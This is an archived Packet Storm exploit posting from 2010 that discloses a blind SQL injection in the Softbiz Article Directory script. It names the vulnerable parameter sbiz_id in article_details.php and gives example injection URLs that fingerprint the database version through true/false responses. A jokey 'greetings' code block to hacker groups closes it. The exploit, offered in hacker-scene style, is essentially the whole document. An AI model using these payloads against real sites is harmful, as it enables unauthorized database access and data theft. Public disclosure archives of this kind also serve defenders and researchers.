Softbiz Article Directory Blind SQL Injection

2010-09-08T00:00:00
ID PACKETSTORM:93567
Type packetstorm
Reporter BorN To K!LL
Modified 2010-09-08T00:00:00

Description

                                        
                                            `===========================================================  
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln  
[~] Script: Article Directory  
[~] Price: $65  
[~] Link: http://www.softbizscripts.com/article-management-script.php  
===========================================================  
[~] Author: BorN To K!LL - h4ck3r  
[~] Contact: SQL@hotmail.co.uk  
===========================================================  
[~] 3xploit:  
/article_details.php?sbiz_id=[Blind-Injection]  
  
[~] Example:  
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4 // False ,,  
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5 // True ,,  
===========================================================  
[~] Greetings:  
bool Greetings = True;  
if (Greetings = True)  
{  
cout<<"Dr.2"  
<<"Q8 H4x0r"  
<<"Dr.Faustus"  
<<"AsbMay's Group"  
<<"darkc0de team"  
<<"my wife.."  
<<"and all friends \n";  
}  
else  
{  
cout<<"No greeting ..\n";  
}  
===========================================================  
  
  
  
`